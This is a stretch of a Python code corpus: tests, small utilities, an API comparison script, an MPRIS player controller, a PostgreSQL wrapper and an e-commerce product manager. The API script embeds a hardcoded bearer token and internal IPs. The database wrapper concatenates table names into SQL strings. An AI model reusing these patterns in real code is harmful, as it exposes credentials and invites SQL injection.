it\nMyGame().run()\n","sub_path":"topdown/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
+{"seq_id":"327694806","text":"import unittest\n\nimport solutions.shortest_distance_to_a_character.index as main\n\n\nclass Test(unittest.TestCase):\n\n    def test_shortestToChar(self):\n        test_patterns = [\n            (\"loveleetcode\", \"e\", [3, 2, 1, 0, 1, 0, 0, 1, 2, 2, 1, 0]),\n        ]\n\n        for i, (arg1, arg2, expected) in enumerate(test_patterns):\n            with self.subTest(test=i):\n                s = main.Solution()\n                self.assertEqual(s.shortestToChar(arg1, arg2), expected)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"solutions/shortest_distance_to_a_character/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
+{"seq_id":"584398286","text":"from os.path import exists\n\ndef intro():\n    print(\"\\nThis program asks to enter some sentences, until you just press [enter].\\nWhen you are done with the input, the program will print all the lines.\\nAfter that, it will ask you if you would like to save it to a file.\\n\")\n\ndef input_text():\n    text_list = []\n    while(True):\n        question = input(\"Enter a sentence: \")\n        if(len(question) == 0):\n            return text_list\n        else:\n            text_list.append(question)\n\ndef print_list_to_screen(text_list):\n    for i in text_list:\n        print(i)\n\ndef question_choice(question, possible_answer_tuple):\n    while(True):\n        ask_question = input(question)\n        for k in possible_answer_tuple:\n            if(ask_question == k):\n                return ask_question\n\ndef save_to_file(file_name, text_list):\n    if (not exists(file_name)):\n        f = open(file_name, \"x\")\n        f.close()\n    else:\n        choice = question_choice(\"This file already exists, want to overwrite it? (y/n) \", (\"y\", \"n\"))\n        if(choice == \"n\"):\n            exit()\n    f = open(file_name, \"w\")\n    data = \"\"\n    for t in text_list:\n        data += f\"{t}\\n\"\n    f.write(data)\n    f.close()\n\ndef save_question(text_list):\n    choice = question_choice(\"Would you like to save the list to a file (y/n) \", (\"y\", \"n\"))\n    file_name = input(\"Enter the name of the file, example, list.txt: \")\n    if(choice == \"n\"):\n        exit()\n    save_to_file(file_name, text_list)\n\ndef wordprocessor_app():\n    intro()\n    text_list = input_text()\n    print_list_to_screen(text_list)\n    save_question(text_list)\n    question = question_choice(\"Would you like to make another list? 
(y/n): \", (\"y\", \"n\"))\n    if(question == \"y\"):\n        return wordprocessor_app()\n    else:\n        exit()\n\ndef main():\n    wordprocessor_app()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"python/save_list/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
+{"seq_id":"154786937","text":"# -*- coding: UTF-8 -*-\n\n'''\nCreated on 2020/11/13 16:01\n@File  : get_kicp_test.py\n@author: ZL\n@Desc  :\n'''\n\nimport requests\nimport uuid\nimport pandas\nimport os\nfrom commonfunc.change_data_type import ChangeDataType\nfrom tqdm import tqdm\nimport datetime\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n\n\nclass GetItemCompare:\n\n    def get_test(self):\n        url1 = \"http://192.168.1.16:10000/x/identify/v1/re_unify/identify\"\n        url2 = \"http://192.168.26.105:32233/kicp_server\"\n        re_item1_list, re_item1_en_list, re_item2_list, re_intent1_list, re_intent1_en_list, re_intent2_list, re_ner1_list, re_ner2_list = [], [], [], [], [], [], [], []\n        item_tf, intent_tf, ner_tf = [], [], []\n        sentence_test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\test.csv\")\n        intent_test_data = ChangeDataType.file_to_dict(\n            rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\intent_tab.xlsx\",\n            sheet_name=\"English_tab\")\n        topic_test_data = ChangeDataType.file_to_dict(\n            rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\topic_ch_en.xlsx\",\n            sheet_name=\"Sheet1\")\n        en_intent = intent_test_data.k.tolist()\n        cn_intent = intent_test_data.v.tolist()\n        intent_dict = dict(zip(en_intent, cn_intent))\n        en_topic = topic_test_data.topic.tolist()\n        cn_topic = topic_test_data.english.tolist()\n        topic_dict = dict(zip(en_topic, cn_topic))\n        headers1 = {\n            \"Authorization\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21wYW55X2lkIjoxNTIsInJvYm90X2lkIjo4NDQsImV4cCI6MTYwNjExODE3NH0.flFiMl6TtwQJZ8vzqzCvKlkNNhwKE2n_71ixCLEsvlk\",\n            \"Content-Type\": \"application/x-www-form-urlencoded\"\n        }\n        headers2 = {\n            \"Content-Type\": \"application/x-www-form-urlencoded\"\n        }\n        test_sentence_list = []\n        sentence_list = sentence_test_data.sentence.tolist()\n        for sentence in tqdm(sentence_list):\n            # Build the two request payloads; the client_id in the two params must differ, otherwise errors occur. Since results for the same id are very slow, different ids are checked first\n            params1 = {\n                \"dialog\": sentence,\n                \"client_id\": str(uuid.uuid1())\n            }\n            params2 = {\n                \"sentence\": sentence,\n                \"session_id\": str(uuid.uuid1()),\n                \"industry\": \"yiliao\",\n                \"domain\": '[\"dentistry\"]'\n            }\n            result1 = requests.post(url=url1, data=params1, headers=headers1).json()\n            result2 = requests.post(url=url2, data=params2, headers=headers2).json()\n            try:\n\n                # 1. Get the item value\n                if \"item\" in result1[\"data\"][\"ner\"].keys():\n                    re_item1 = result1[\"data\"][\"ner\"][\"item\"][\"Value\"][0][\"Value\"]\n                else:\n                    re_item1 = \"Empty\"\n                re_item2 = result2[\"data\"][0][\"topic\"][0][\"key\"]\n\n                # 2. Get the intent value\n                re_intent1 = result1[\"data\"][\"ner\"][\"intent\"][\"Value\"][0][\"Value\"]\n                re_intent2 = result2[\"data\"][0][\"topic\"][0][\"intent\"][0][\"key\"]\n\n                # 3. Get the NER result; drop item, intent, action and bio, and check the remaining fields\n                confirm_list = []\n                del result1[\"data\"][\"ner\"][\"action\"]\n\n                if \"bio\" in result1[\"data\"][\"ner\"]:\n                    del result1[\"data\"][\"ner\"][\"bio\"]\n\n                for i in result1[\"data\"][\"ner\"].keys():\n                    if \"intent\" not in i and \"item\" not in i:\n                        confirm_list.append(i)\n                re_ner1 = []\n                for j in confirm_list:\n                    confirm_value1 = []\n                    for k in 
result1[\"data\"][\"ner\"][j][\"Value\"]:\n confirm_value1.append(k[\"Value\"])\n re_ner1.append({'key': j, \"value\": confirm_value1})\n re_ner2 = result2[\"data\"][0][\"entity\"]\n except Exception as e:\n print(result1)\n print(result2)\n test_sentence_list.append(sentence)\n re_item1_list.append(\"error\")\n re_item1_en_list.append(\"error\")\n re_item2_list.append(\"error\")\n item_tf.append(\"error\")\n re_intent1_list.append(\"error\")\n re_intent1_en_list.append(\"error\")\n re_intent2_list.append(\"error\")\n intent_tf.append(\"error\")\n re_ner1_list.append(\"error\")\n re_ner2_list.append(\"error\")\n ner_tf.append(\"error\")\n print(e)\n print(sentence)\n\n re_ner1_list.append(re_ner1)\n re_ner2_list.append(re_ner2)\n ner_tf.append(re_ner1 == re_ner2)\n test_sentence_list.append(sentence)\n re_intent1_list.append(re_intent1)\n re_intent1_en_list.append(intent_dict[re_intent1])\n re_intent2_list.append(re_intent2)\n intent_tf.append(intent_dict[re_intent1] == re_intent2)\n re_item1_list.append(re_item1)\n re_item1_en_list.append(topic_dict[re_item1] if re_item1 != \"Empty\" else \"Empty\")\n re_item2_list.append(re_item2)\n item_tf.append(re_item2 == (topic_dict[re_item1] if re_item1 != \"Empty\" else \"Empty\"))\n\n result_data = pandas.DataFrame(\n {\"sentence\": test_sentence_list, \"re_item1_list\": re_item1_list, \"re_item1_en_list\": re_item1_en_list,\n \"re_item2_list\": re_item2_list, \"item_tf\": item_tf,\n \"re_intent1_list\": re_intent1_list, \"re_intent1_en_list\": re_intent1_en_list,\n \"re_intent2_list\": re_intent2_list, \"intent_tf\": intent_tf,\n \"re_ner1_list\": re_ner1_list, \"re_ner2_list\": re_ner2_list, \"ner_tf\": ner_tf})\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\item\\\\\" + now + \"item_result.csv\")\n\n def get_lot_test(self):\n url2 = \"http://192.168.26.105:30237/kicp_server\"\n sentence_test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\test.csv\")\n intent_test_data = ChangeDataType.file_to_dict(\n rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\intent_tab.xlsx\",\n sheet_name=\"English_tab\")\n topic_test_data = ChangeDataType.file_to_dict(\n rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\topic_ch_en.xlsx\",\n sheet_name=\"Sheet1\")\n re_ner2_list, re_item_en_list, re_intent2_list, re_intent_en_list, re_item2_list, topic_tf, intent_tf = [], [], [], [], [], [], []\n en_intent = intent_test_data.k.tolist()\n cn_intent = intent_test_data.v.tolist()\n intent_dict = dict(zip(en_intent, cn_intent))\n en_topic = topic_test_data.topic.tolist()\n cn_topic = topic_test_data.english.tolist()\n topic_dict = dict(zip(en_topic, cn_topic))\n headers2 = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n test_sentence_list = []\n sentence_list = sentence_test_data.sentence.tolist()\n for sentence in tqdm(sentence_list):\n params2 = {\n \"sentence\": sentence,\n \"session_id\": str(uuid.uuid1()),\n \"industry\": \"yiliao\",\n \"domain\": '[\"dentistry\"]'\n }\n result2 = requests.post(url=url2, data=params2, headers=headers2).json()\n try:\n re_item_en = result2[\"data\"][0][\"topic\"][0][\"key\"]\n re_item2 = result2[\"data\"][0][\"topic\"][0][\"name\"]\n re_intent_en = result2[\"data\"][0][\"topic\"][0][\"intent\"][0][\"key\"]\n re_intent2 = result2[\"data\"][0][\"topic\"][0][\"intent\"][0][\"name\"]\n re_ner2 = result2[\"data\"][0][\"entity\"]\n ttf = (re_item_en == 
topic_dict[re_item2])\n itf = (re_intent_en == intent_dict[re_intent2])\n except Exception as e:\n print(e)\n print(sentence)\n re_ner2_list.append(re_ner2)\n re_item_en_list.append(re_item_en)\n re_intent_en_list.append(re_intent_en)\n test_sentence_list.append(sentence)\n re_intent2_list.append(re_intent2)\n re_item2_list.append(re_item2)\n topic_tf.append(ttf)\n intent_tf.append(itf)\n result_data = pandas.DataFrame(\n {\"sentence\": test_sentence_list, \"re_ite_en_list\": re_item_en_list, \"re_item2_list\": re_item2_list, \"topic_tf\": topic_tf,\n \"re_intent_en_list\": re_intent_en_list, \"re_intent2_list\": re_intent2_list, \"intent_tf\": intent_tf, \"re_ner2_list\": re_ner2_list})\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\item\\\\\" + now + \"item_result.csv\")\n\n\nif __name__ == '__main__':\n GetItemCompare().get_lot_test()\n","sub_path":"api/get_kcip_test.py","file_name":"get_kcip_test.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"558307255","text":"import dbus\nimport time\nimport logging\n\nfrom metadata import Metadata\n\nPLAYING = \"playing\"\n\nmpris = None\n\nMPRIS_NEXT = \"Next\"\nMPRIS_PREV = \"Previous\"\nMPRIS_PAUSE = \"Pause\"\nMPRIS_PLAYPAUSE = \"PlayPause\"\nMPRIS_STOP = \"Stop\"\nMPRIS_PLAY = \"Play\"\n\nmpris_commands = [MPRIS_NEXT, MPRIS_PREV,\n MPRIS_PAUSE, MPRIS_PLAYPAUSE,\n MPRIS_STOP, MPRIS_PLAY]\n\n\ndef array_to_string(arr):\n \"\"\"\n Converts an array of objects to a comma separated string\n \"\"\"\n res = \"\"\n for part in arr:\n res = res + part + \", \"\n if len(res) > 1:\n return res[:-2]\n else:\n return \"\"\n\n\nclass PlayerState:\n \"\"\"\n Internal representation of the state of a player\n \"\"\"\n\n def __init__(self, state=\"unknown\", metadata=None):\n self.state = state\n if metadata is not None:\n self.metadata = metadata\n else:\n self.metadata = Metadata()\n\n def __str__(self):\n return self.state + str(self.metadata)\n\n\nclass MPRISController:\n \"\"\"\n Controller for MPRIS enabled media players\n \"\"\"\n\n def __init__(self, auto_pause=True):\n self.state_table = {}\n self.bus = dbus.SystemBus()\n self.auto_pause = auto_pause\n self.metadata_displays = []\n\n def register_metadata_display(self, mddisplay):\n self.metadata_displays.append(mddisplay)\n\n def metadata_notify(self, metadata):\n for md in self.metadata_displays:\n md.metadata(metadata)\n\n def retrievePlayers(self):\n \"\"\"\n Returns a list of all MPRIS enabled players that are active in \n the system\n \"\"\"\n return [name for name in self.bus.list_names()\n if name.startswith(\"org.mpris\")]\n\n def retrieveState(self, name):\n \"\"\"\n Returns the playback state for the given player instance\n \"\"\"\n try:\n proxy = self.bus.get_object(name, \"/org/mpris/MediaPlayer2\")\n device_prop = dbus.Interface(\n proxy, \"org.freedesktop.DBus.Properties\")\n state = device_prop.Get(\"org.mpris.MediaPlayer2.Player\",\n \"PlaybackStatus\")\n return state\n except:\n return None\n\n def retrieveMeta(self, name):\n \"\"\"\n Return the metadata for the given player instance\n \"\"\"\n try:\n proxy = self.bus.get_object(name, \"/org/mpris/MediaPlayer2\")\n device_prop = dbus.Interface(\n proxy, \"org.freedesktop.DBus.Properties\")\n prop = device_prop.Get(\n \"org.mpris.MediaPlayer2.Player\", \"Metadata\")\n try:\n artist = array_to_string(prop.get(\"xesam:artist\"))\n except:\n artist = 
None\n\n try:\n title = str(prop.get(\"xesam:title\"))\n except:\n title = None\n\n try:\n albumArtist = array_to_string(prop.get(\"xesam:albumArtist\"))\n except:\n albumArtist = None\n\n try:\n albumTitle = str(prop.get(\"xesam:album\"))\n except:\n albumTitle = None\n\n try:\n artURL = str(prop.get(\"mpris:artUrl\"))\n except:\n artURL = None\n\n try:\n discNumber = str(prop.get(\"xesam:discNumber\"))\n except:\n discNumber = None\n\n try:\n trackNumber = str(prop.get(\"xesam:trackNumber\"))\n except:\n trackNumber = None\n\n md = Metadata(artist, title, albumArtist, albumTitle,\n artURL, discNumber, trackNumber)\n\n md.playerName = self.playername(name)\n\n md.fixProblems()\n\n return md\n\n except dbus.exceptions.DBusException as e:\n logging.debug(e)\n\n def mpris_command(self, playername, command):\n if command in mpris_commands:\n proxy = self.bus.get_object(playername,\n \"/org/mpris/MediaPlayer2\")\n player = dbus.Interface(\n proxy, dbus_interface='org.mpris.MediaPlayer2.Player')\n\n run_command = getattr(player, command,\n lambda: \"Unknown command\")\n return run_command()\n else:\n raise RuntimeError(\"MPRIS command {} not supported\".format(\n command))\n\n def pause_inactive(self, active_player):\n \"\"\"\n Automatically pause other players if playback was started \n on a new player\n \"\"\"\n for p in self.state_table:\n if (p != active_player) and \\\n (self.state_table[p].state == PLAYING):\n logging.info(\"Pausing \" + self.playername(p))\n self.mpris_command(p, MPRIS_PAUSE)\n\n def pause_all(self):\n for player in self.state_table:\n self.mpris_command(player, MPRIS_PAUSE)\n\n def print_players(self):\n for p in self.state_table:\n print(self.playername(p))\n\n def playername(self, mprisname):\n if (mprisname.startswith(\"org.mpris.MediaPlayer2.\")):\n return mprisname[23:]\n else:\n return mprisname\n\n def main_loop(self):\n \"\"\" \n Main loop: \n - monitors state of all players\n - pauses players if a new player starts playback\n \"\"\"\n\n finished = False\n md = Metadata()\n active_players = set()\n while not(finished):\n new_player_started = None\n\n for p in self.retrievePlayers():\n\n if p not in self.state_table:\n self.state_table[p] = PlayerState()\n\n try:\n state = self.retrieveState(p).lower()\n except:\n logging.info(\"Got no state from \" + p)\n state = \"unknown\"\n self.state_table[p].state = state\n\n # Check if playback started on a player that wasn't\n # playing before\n if state == PLAYING:\n if (p not in active_players):\n new_player_started = p\n active_players.add(p)\n\n md_old = self.state_table[p].metadata\n md = self.retrieveMeta(p)\n\n self.state_table[p].metadata = md\n if md is not None:\n if not(md.sameSong(md_old)):\n self.metadata_notify(md)\n else:\n if p in active_players:\n active_players.remove(p)\n\n if new_player_started is not None:\n if self.auto_pause:\n logging.info(\n \"new player started, pausing other active players\")\n self.pause_inactive(new_player_started)\n else:\n logging.debug(\"auto-pause disabled\")\n\n time.sleep(0.2)\n\n def __str__(self):\n \"\"\"\n String representation of the current state: all players,\n playback state and meta data\n \"\"\"\n res = \"\"\n for p in self.state_table:\n res = res + \"{:30s} - {:10s}: {}/{}\\n\".format(\n self.playername(p),\n self.state_table[p].state,\n self.state_table[p].metadata.artist,\n self.state_table[p].metadata.title)\n\n return 
res\n","sub_path":"buildroot/package/audiocontrol2/src/mpris.py","file_name":"mpris.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"654449794","text":"import psycopg2\r\nimport config\r\n\r\nclass PostgreSQL:\r\n def __init__(self, database):\r\n self.conn = psycopg2.connect(config.postgre_conn_string)\r\n self.cursor = self.conn.cursor()\r\n\r\n def select_all(self,table):\r\n self.cursor.execute('SELECT * FROM '+table)\r\n res = self.cursor.fetchall()\r\n return res\r\n\r\n def select_single(self, table, rownum):\r\n self.cursor.execute(\"\"\"SELECT * FROM \"\"\"+table + \"\"\" WHERE id='%s'\"\"\", (rownum,))\r\n item = self.cursor.fetchall()\r\n if item:\r\n return item[0]\r\n return None\r\n\r\n def count_rows(self, table):\r\n self.cursor.execute('SELECT * FROM ' + table)\r\n result = self.cursor.fetchall()\r\n return len(result)\r\n\r\n def add(self, table, item):\r\n self.cursor = self.conn.cursor()\r\n length = len(item)\r\n str = ''\r\n for i in range(length):\r\n str = str + \"%s, \"\r\n str = str[:-2]\r\n self.cursor.execute(\"INSERT INTO \" + table + \"(id, file_id, right_answer, wrong_answer) VALUES(\" + str + \")\", (item))\r\n self.cursor.close()\r\n self.conn.commit()\r\n\r\n def delete_single(self, table, rownum):\r\n self.cursor.execute(\"\"\"DELETE FROM \"\"\" + table + \"\"\" WHERE id='%s'\"\"\", (rownum,))\r\n self.cursor.close()\r\n self.conn.commit()\r\n\r\n def delete_all(self, table):\r\n self.cursor.execute(\"\"\"DELETE FROM \"\"\" + table + \"\"\";\"\"\")\r\n self.cursor.close()\r\n self.conn.commit()\r\n","sub_path":"PostgreSQL.py","file_name":"PostgreSQL.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"447390253","text":"# -*- coding:utf8 -*-\n# @TIME : 2019/3/17 10:17\n# @Author : SuHao\n# @File : set_weight.py\n\nimport math\nimport numpy as np\nfrom sklearn import preprocessing\n\n\ndef gaussian(dist, a=1, b=0, c=0.8):\n dist = (dist - np.mean(dist))/np.std(dist) #高斯方法采用正态归一化\n return a * math.e ** (-(dist - b) ** 2 / (2 * c ** 2))\n\n\ndef reverse(dist, const=1):\n min_max_scaler = preprocessing.MinMaxScaler()\n dist = min_max_scaler.fit_transform(dist) #采用库函数自带的最大最小归一化\n return 1 / (dist + const)\n\n\ndef reverse_weight(neighbor, label_num):\n # 此处neighbor存放着近邻点的距离和对应的标签\n label = neighbor[:, 1].astype(np.int8)\n prob = np.zeros((label_num, ))\n reverse_dist = reverse(neighbor[:, 0])\n for i in range(label_num):\n prob[i] = np.sum((label == i) * reverse_dist)\n prob = prob / np.sum(reverse_dist)\n result = np.argmax(prob)\n return prob, result\n\n\ndef uniform_weight(neighbor, label_num):\n label = neighbor[:, 1].astype(np.int8)\n prob = np.bincount(\n label, minlength=label_num) / neighbor.shape[0]\n result = np.argmax(prob)\n return prob, result\n\n\ndef gaussian_weight(neighbor, label_num):\n '''\n :param neighbor: 两列,第一列存放距离,第二列存放标签\n :param label_num: 总的标签数量\n :return: 预测结果和预测置信度\n '''\n label = neighbor[:, 1].astype(np.int8)\n prob = np.zeros((label_num, ))\n gaussian_dist = gaussian(neighbor[:, 0])\n for i in range(label_num):\n prob[i] = np.sum((label == i) * gaussian_dist)\n prob = prob / np.sum(gaussian_dist)\n result = np.argmax(prob)\n return prob, 
result\n","sub_path":"myKnn/set_weight.py","file_name":"set_weight.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"652505263","text":"def is_number_balanced(n):\n\tif n // 10 == 0:\n\t\treturn True\n\n\ttemp = n\n\tlength = 0\n\twhile temp > 0:\n\t\tlength += 1\n\t\ttemp //= 10\n\n\trightPart = 0\n\thalflen = length // 2\n\twhile halflen > 0:\n\t\trightPart += n % 10\n\t\tn //= 10\n\t\thalflen -= 1\n\n\tif length % 2 != 0:\n\t\tn //= 10\n\n\tleftPart = 0\n\twhile n > 0:\n\t\tleftPart += n % 10\n\t\tn //= 10\n\n\tif leftPart == rightPart:\n\t\treturn True\n\treturn False\n\nprint(is_number_balanced(1238033))","sub_path":"Week0/Problems1/list_to_number.py","file_name":"list_to_number.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"83467039","text":"################################################################\n# Author : yiorgosynkl (find me in Github: https://github.com/yiorgosynkl)\n# Date created : 20210314\n# Problem link : https://leetcode.com/problems/swapping-nodes-in-a-linked-list/\n################################################################\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nclass Solution:\n def swapNodes(self, head: ListNode, k: int) -> ListNode:\n ptr, l = head, 0\n while ptr:\n l += 1\n ptr = ptr.next\n dummy = ListNode(0, head)\n ptr1, ptr2 = dummy, dummy\n for _ in range(k-1):\n ptr1 = ptr1.next\n for _ in range(l-k):\n ptr2 = ptr2.next\n ptr1, ptr1.next, ptr2, ptr2.next = ptr2.next, ptr2.next.next, ptr1.next, ptr1.next.next\n ptr1.val, ptr2.val = ptr2.val, ptr1.val\n return head\n\n # # pointers k apart\n # def swapNodes(self, head: ListNode, k: int) -> ListNode:\n # lo, hi = head, head\n # for _ in range(k-1):\n # hi = hi.next\n # swap1 = hi\n # while hi.next:\n # lo = lo.next\n # hi = hi.next\n # swap2 = lo\n # swap1.val, swap2.val = swap2.val, swap1.val\n # return head\n","sub_path":"30_day_challenge_2021_March/1721_swapping_nodes_in_a_linked_list.py","file_name":"1721_swapping_nodes_in_a_linked_list.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"28384699","text":"#!/usr/bin/python3\n\n# Input: \n# 5\n# 5 6 2 7 4\n# Output:\n# 6 * 7 = 42\n\n# To test with dataset \"python3 filename.py < dataset.txt\"\n\n\"\"\" Find the largest pair of integers and calculate if their product is the largest. \"\"\"\n\nn = int(input())\na = [int(x) for x in input().split()]\n\nindex_1 = 0\nfor i in range(1, n):\n if a[i] > a[index_1]:\n index_1 = i\n\nif index_1 == 0:\n index_2 = 1\nelse:\n index_2 = 0\n\nfor i in range(0, n):\n if a[i] != a[index_1] and a[i] > a[index_2]:\n index_2 = i\n\nprint(a[index_1] * a[index_2])","sub_path":"edx/algs200x/week1/MaxPairwiseProductFast.py","file_name":"MaxPairwiseProductFast.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"274449285","text":"#Garden Bed\n#A program that calculates the # of board feet and # of full 12' boards\n# needed to build a raised garden bed. 
It also calculates the cubic yds\n# of soil needed to fill it.\n\nimport graphics as g\n\ndef gardenBed():\n \n win = g.GraphWin('Garden Bed Calculator', 800, 800)\n \n dimText = g.Text (g.Point(400, 25), \"Enter the dimensions in feet for your bed type\")\n dimText.draw ( win )\n \n bedSquare = g.Rectangle( g.Point( 50, 100 ), g.Point ( 225, 275 ))\n bedRectangle = g.Rectangle( g.Point( 350, 100 ), g.Point ( 475, 350 ))\n# bedHexagon =\n# bedIrregular =\n \n bedSquare.draw ( win )\n bedRectangle.draw ( win )\n \n dimSquare = g.Entry( g.Point( 137, 80 ), 2 )\n dimSquare.draw (win)\n \n dimRectShort = g.Entry( g.Point( 412, 80 ), 2 )\n dimRectShort.draw (win)\n \n dimRectLong = g.Entry( g.Point( 325, 225 ), 2 )\n dimRectLong.draw (win)\n \n#Determine height of garden bed\n# bedHeight = input(\"What will be the height of your garden bed? \")\n \n#Calculate perimeters\n# if bedType == 1:\n# perimeter = float(input(\"What is the length of one side of your bed? \")) * 4\n# if bedType == 2:\n# perimeter = float(input(\"What is the length of one short end of your box? \")) * 2 + float(input(\"What is the length of one long end of your box? \")) * 2\n\n#Calculate volume\n\n#Calculate total board feet\n\n#Calculate total 12' boards needed\n\n\ngardenBed()\n ","sub_path":"garden_bed.py","file_name":"garden_bed.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"52074815","text":"__author__ = \"Pierre Galaup - Nicolas Garcia\"\n\nfrom time import time\n\nfrom Product import Product\nfrom Exceptions import ACLError\nfrom CategoriesManager import CategoriesManager\n\n\nclass ProductsManager:\n total = 0\n\n def __init__(self):\n self.products = []\n self.total += 1\n self.categories_mng = CategoriesManager()\n\n def __del__(self):\n self.total -= 1\n\n def get_products(self):\n return self.products\n\n def add_product(self, name, categories, description, image, start_price, vendor_id, start_date, end_date,\n shipping_cost,\n is_direct):\n if len(name) < 2 or len(description) < 10:\n raise AssertionError('Too short string')\n if start_price < 0 or shipping_cost < 0 or vendor_id < 0:\n raise AssertionError('Int not correct')\n if int(end_date) <= int(start_date) and is_direct == 0:\n raise AssertionError('Dates are not correct')\n if not isinstance(categories, list) or len(categories) < 1:\n raise AssertionError('Categories are not a list or is empty')\n if not is_direct == 1 and not is_direct == 0:\n raise AssertionError('is_direct must be 0 or 1 only')\n if end_date < start_date + 300 and is_direct == 0: # 5 minutes is the minimum duration for an auction\n raise AssertionError('Wrong period or too short')\n for category in categories:\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.increase_products_count()\n except ValueError:\n raise AssertionError('Category with id [' + category.__str__() + '] does not exists')\n product = Product(name, categories, description, image, start_price, start_date, end_date, shipping_cost,\n vendor_id, is_direct)\n self.products.append(product)\n return product\n\n def import_product(self, product, to_append=True):\n new_product = Product(product['name'], product['categories'], product['description'], product['image'],\n product['start_price'],\n product['start_date'], product['end_date'], product['shipping_cost'],\n product['vendor_id'], product['is_direct'], product['bidders'], product['bid_count'],\n product['current_price'],\n 
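# note (added comment): the trailing arguments (bidders, bid_count, current_price and the stored id) restore persisted auction state on import; Product.__init__ is assumed to accept them in this order, matching this call\n 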
product['id'])\n for category in new_product.get_categories():\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.increase_products_count()\n except ValueError:\n raise AssertionError('Category with id [' + category.__str__() + '] does not exists')\n if to_append:\n self.products.append(new_product)\n else:\n return new_product\n\n def get_product_by_id(self, _id):\n \"\"\"\n\n @rtype : Product\n \"\"\"\n for product in self.products:\n if product.get_id() == _id:\n return product\n raise ValueError('Product.id not found')\n\n def get_product_by_name(self, name):\n \"\"\"\n\n @rtype : Product\n \"\"\"\n for product in self.products:\n if product.get_name() == name:\n return product\n raise ValueError('Product.name not found')\n\n def del_product(self, _id):\n for product in self.products:\n if product.get_id() == _id:\n for category in product.get_categories():\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.decrease_products_count()\n if cat.get_products_count() == 0:\n self.categories_mng.del_category(category)\n except ValueError:\n raise AssertionError('Category with id [' + category + '] does not exists')\n self.products.remove(product)\n return True\n raise ValueError('Product.id not found')\n\n def upt_product(self, _id, name, description, image, categories, start_price, shipping_cost, end_date, is_direct,\n current_user):\n product = self.get_product_by_id(_id)\n if product.get_vendor_id() != current_user:\n raise ACLError('Not vendor trying to modify bid')\n if len(name) < 2 or len(description) < 10:\n raise AssertionError('Too short string')\n if len(name) < 2 or start_price < 0 or shipping_cost < 0:\n raise AssertionError('Int not correct')\n if (int(end_date) <= int(product.get_start_date())) and is_direct == 0:\n raise AssertionError('Dates are not correct')\n if not isinstance(categories, list) or len(categories) < 1:\n raise AssertionError('Categories are not a list or is empty')\n if (end_date < product.get_start_date() + 300 or end_date <= time()) and is_direct == 0:\n raise AssertionError('Wrong period or too short')\n if len(product.get_bidders()) > 0:\n if start_price != product.get_start_price():\n raise AssertionError('Cannot modify a start price of a bid if there is already bids on it')\n if not is_direct == 0 and not is_direct == 1 and is_direct != product.get_is_direct():\n raise AssertionError('Cannot toggle a bid to an instant-buy if there is already bids on it')\n if product.end_date != end_date:\n raise AssertionError('Cannot change a bid\\'s end date if there is already bids on it.')\n if product.get_shipping_cost() != shipping_cost:\n raise AssertionError('Cannot change bid\\'s shipping cost if there is already bids on it')\n\n for category in categories:\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.increase_products_count()\n except ValueError:\n raise AssertionError('Category with id [' + category + '] does not exists')\n for category in product.get_categories():\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.decrease_products_count()\n if cat.get_products_count() == 0:\n self.categories_mng.del_category(category)\n except ValueError:\n raise AssertionError('Category with id [' + category + '] does not exists')\n product.name = name\n product.description = description\n product.categories = categories\n product.start_price = start_price\n product.shipping_cost = shipping_cost\n product.end_date = end_date\n product.is_direct = is_direct\n product.image = image\n return 
